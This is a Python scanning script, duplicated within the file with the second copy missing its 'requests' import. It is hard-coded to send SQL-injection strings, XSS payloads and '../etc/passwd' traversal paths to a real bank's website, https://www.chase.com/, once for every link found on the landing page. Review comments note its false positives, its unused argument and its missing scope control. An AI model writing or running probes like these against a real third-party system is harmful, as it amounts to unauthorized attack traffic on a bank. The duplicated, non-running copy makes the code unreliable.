import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
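# Target host for every check in this script.
# NOTE(review): the target is hard-coded; a scanner normally reads its
# in-scope host from configuration so it cannot run against a host that is
# outside the agreed test scope.
base_url = 'https://www.chase.com/'

# Fetch the landing page; its anchors are parsed further down.
# The timeout keeps an unresponsive server from hanging the script forever
# (requests has no default timeout).
response = requests.get(base_url, timeout=10)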
# Check for SQL injection vulnerabilities
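def check_sql_injection(url):
    """Request a fixed list of SQL-injection test strings and print suspicious responses.

    Each string is joined onto the module-level ``base_url`` with ``urljoin``
    and fetched with a GET request. A response whose body contains
    ``'SQL syntax'`` or ``'error'`` is printed as a potential finding.

    Args:
        url: Link taken from the crawled page.
            NOTE(review): this argument is never read; every call requests
            the same ``base_url``-derived URLs.

    Returns:
        None. Findings and request failures are printed.
    """
    sql_injection_payloads = [
        "' OR 1=1--",
        "' OR '1'='1",
        "' OR ''='",
        "' OR 1=1/*",
        "' OR 'x'='x",
        "' OR 'x'='x'/*",
        "' OR 'y'='y",
        "' OR 'y'='y'/*",
        "' OR 'z'='z",
        "' OR 'z'='z'/*",
        "' OR 'a'='a",
        "' OR 'a'='a'/*"
    ]
    for payload in sql_injection_payloads:
        # urljoin treats the payload as a relative reference, so it becomes
        # part of the URL path.
        test_url = urljoin(base_url, payload)
        try:
            # Bounded wait: one stalled request must not hang the whole run.
            response = requests.get(test_url, timeout=10)
        except requests.RequestException as exc:
            print(f"Request failed for {test_url}: {exc}")
            continue
        # NOTE(review): 'error' is a common substring of ordinary pages
        # (scripts, 404 templates), so this test is prone to false positives;
        # a hit is a lead to confirm, not evidence of injection.
        if 'SQL syntax' in response.text or 'error' in response.text:
            print(f"Potential SQL injection vulnerability found: {test_url}")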
# Check for XSS vulnerabilities
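def check_xss(url):
    """Request a fixed list of XSS test strings and print any that are echoed back.

    Each string is joined onto the module-level ``base_url`` with ``urljoin``
    and fetched with a GET request. If the exact string appears in the
    response body, it is printed as a potential finding.

    Args:
        url: Link taken from the crawled page.
            NOTE(review): this argument is never read; every call requests
            the same ``base_url``-derived URLs.

    Returns:
        None. Findings and request failures are printed.
    """
    xss_payloads = [
        "<script>alert('XSS')</script>",
        "<img src=x onerror=alert('XSS')>",
        "<svg/onload=alert('XSS')>"
    ]
    for payload in xss_payloads:
        # urljoin treats the payload as a relative reference, so it becomes
        # part of the URL path.
        test_url = urljoin(base_url, payload)
        try:
            # Bounded wait: one stalled request must not hang the whole run.
            response = requests.get(test_url, timeout=10)
        except requests.RequestException as exc:
            print(f"Request failed for {test_url}: {exc}")
            continue
        # A verbatim echo only shows the string came back unencoded somewhere
        # in the body; it does not establish the context it landed in or
        # whether a browser would execute it.
        if payload in response.text:
            print(f"Potential XSS vulnerability found: {test_url}")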
# Check for directory traversal vulnerabilities
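def check_directory_traversal(url):
    """Request a fixed list of traversal-style paths and print those answered with 200.

    Each path is joined onto the module-level ``base_url`` with ``urljoin``
    and fetched with a GET request. A 200 status is printed as a potential
    finding.

    Args:
        url: Link taken from the crawled page.
            NOTE(review): this argument is never read; every call requests
            the same ``base_url``-derived URLs.

    Returns:
        None. Findings and request failures are printed.
    """
    directory_traversal_payloads = [
        "../../../../etc/passwd",
        "../../../../windows/win.ini",
        "../../../../../../etc/passwd",
        "../../../../../../windows/win.ini"
    ]
    for payload in directory_traversal_payloads:
        # NOTE(review): urljoin resolves the leading '..' segments against
        # base_url, so the URL requested here is the plain path under the
        # site root (e.g. .../etc/passwd), not a traversal sequence.
        test_url = urljoin(base_url, payload)
        try:
            # Bounded wait: one stalled request must not hang the whole run.
            response = requests.get(test_url, timeout=10)
        except requests.RequestException as exc:
            print(f"Request failed for {test_url}: {exc}")
            continue
        # NOTE(review): a 200 status alone does not show that a file outside
        # the web root was served; sites that answer unknown paths with a
        # 200 page will be reported here. The body is never inspected.
        if response.status_code == 200:
            print(f"Potential directory traversal vulnerability found: {test_url}")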
# Parse the landing page fetched at the top of the script.
soup = BeautifulSoup(response.text, 'html.parser')

# Collect the href of every anchor; anchors without one yield None.
links = [anchor.get('href') for anchor in soup.find_all('a')]

# Run the three checks once per anchor that carries a non-empty href.
# NOTE(review): the check functions do not read their argument, so each
# iteration repeats the same set of requests.
for link in links:
    if not link:
        continue
    check_sql_injection(link)
    check_xss(link)
    check_directory_traversal(link)
from bs4 import BeautifulSoup
from urllib.parse import urljoin
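# Target host for every check in this script.
# NOTE(review): the target is hard-coded; a scanner normally reads its
# in-scope host from configuration so it cannot run against a host that is
# outside the agreed test scope.
base_url = 'https://www.chase.com/'

# Fetch the landing page; its anchors are parsed further down.
# The timeout keeps an unresponsive server from hanging the script forever
# (requests has no default timeout).
response = requests.get(base_url, timeout=10)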
# Check for SQL injection vulnerabilities
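def check_sql_injection(url):
    """Request a fixed list of SQL-injection test strings and print suspicious responses.

    Each string is joined onto the module-level ``base_url`` with ``urljoin``
    and fetched with a GET request. A response whose body contains
    ``'SQL syntax'`` or ``'error'`` is printed as a potential finding.

    Args:
        url: Link taken from the crawled page.
            NOTE(review): this argument is never read; every call requests
            the same ``base_url``-derived URLs.

    Returns:
        None. Findings and request failures are printed.
    """
    sql_injection_payloads = [
        "' OR 1=1--",
        "' OR '1'='1",
        "' OR ''='",
        "' OR 1=1/*",
        "' OR 'x'='x",
        "' OR 'x'='x'/*",
        "' OR 'y'='y",
        "' OR 'y'='y'/*",
        "' OR 'z'='z",
        "' OR 'z'='z'/*",
        "' OR 'a'='a",
        "' OR 'a'='a'/*"
    ]
    for payload in sql_injection_payloads:
        # urljoin treats the payload as a relative reference, so it becomes
        # part of the URL path.
        test_url = urljoin(base_url, payload)
        try:
            # Bounded wait: one stalled request must not hang the whole run.
            response = requests.get(test_url, timeout=10)
        except requests.RequestException as exc:
            print(f"Request failed for {test_url}: {exc}")
            continue
        # NOTE(review): 'error' is a common substring of ordinary pages
        # (scripts, 404 templates), so this test is prone to false positives;
        # a hit is a lead to confirm, not evidence of injection.
        if 'SQL syntax' in response.text or 'error' in response.text:
            print(f"Potential SQL injection vulnerability found: {test_url}")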
# Check for XSS vulnerabilities
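def check_xss(url):
    """Request a fixed list of XSS test strings and print any that are echoed back.

    Each string is joined onto the module-level ``base_url`` with ``urljoin``
    and fetched with a GET request. If the exact string appears in the
    response body, it is printed as a potential finding.

    Args:
        url: Link taken from the crawled page.
            NOTE(review): this argument is never read; every call requests
            the same ``base_url``-derived URLs.

    Returns:
        None. Findings and request failures are printed.
    """
    xss_payloads = [
        "<script>alert('XSS')</script>",
        "<img src=x onerror=alert('XSS')>",
        "<svg/onload=alert('XSS')>"
    ]
    for payload in xss_payloads:
        # urljoin treats the payload as a relative reference, so it becomes
        # part of the URL path.
        test_url = urljoin(base_url, payload)
        try:
            # Bounded wait: one stalled request must not hang the whole run.
            response = requests.get(test_url, timeout=10)
        except requests.RequestException as exc:
            print(f"Request failed for {test_url}: {exc}")
            continue
        # A verbatim echo only shows the string came back unencoded somewhere
        # in the body; it does not establish the context it landed in or
        # whether a browser would execute it.
        if payload in response.text:
            print(f"Potential XSS vulnerability found: {test_url}")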
# Check for directory traversal vulnerabilities
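def check_directory_traversal(url):
    """Request a fixed list of traversal-style paths and print those answered with 200.

    Each path is joined onto the module-level ``base_url`` with ``urljoin``
    and fetched with a GET request. A 200 status is printed as a potential
    finding.

    Args:
        url: Link taken from the crawled page.
            NOTE(review): this argument is never read; every call requests
            the same ``base_url``-derived URLs.

    Returns:
        None. Findings and request failures are printed.
    """
    directory_traversal_payloads = [
        "../../../../etc/passwd",
        "../../../../windows/win.ini",
        "../../../../../../etc/passwd",
        "../../../../../../windows/win.ini"
    ]
    for payload in directory_traversal_payloads:
        # NOTE(review): urljoin resolves the leading '..' segments against
        # base_url, so the URL requested here is the plain path under the
        # site root (e.g. .../etc/passwd), not a traversal sequence.
        test_url = urljoin(base_url, payload)
        try:
            # Bounded wait: one stalled request must not hang the whole run.
            response = requests.get(test_url, timeout=10)
        except requests.RequestException as exc:
            print(f"Request failed for {test_url}: {exc}")
            continue
        # NOTE(review): a 200 status alone does not show that a file outside
        # the web root was served; sites that answer unknown paths with a
        # 200 page will be reported here. The body is never inspected.
        if response.status_code == 200:
            print(f"Potential directory traversal vulnerability found: {test_url}")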
# Parse the landing page fetched earlier in the script.
soup = BeautifulSoup(response.text, 'html.parser')

# Collect the href of every anchor; anchors without one yield None.
links = [anchor.get('href') for anchor in soup.find_all('a')]

# Run the three checks once per anchor that carries a non-empty href.
# NOTE(review): the check functions do not read their argument, so each
# iteration repeats the same set of requests.
for link in links:
    if not link:
        continue
    check_sql_injection(link)
    check_xss(link)
    check_directory_traversal(link)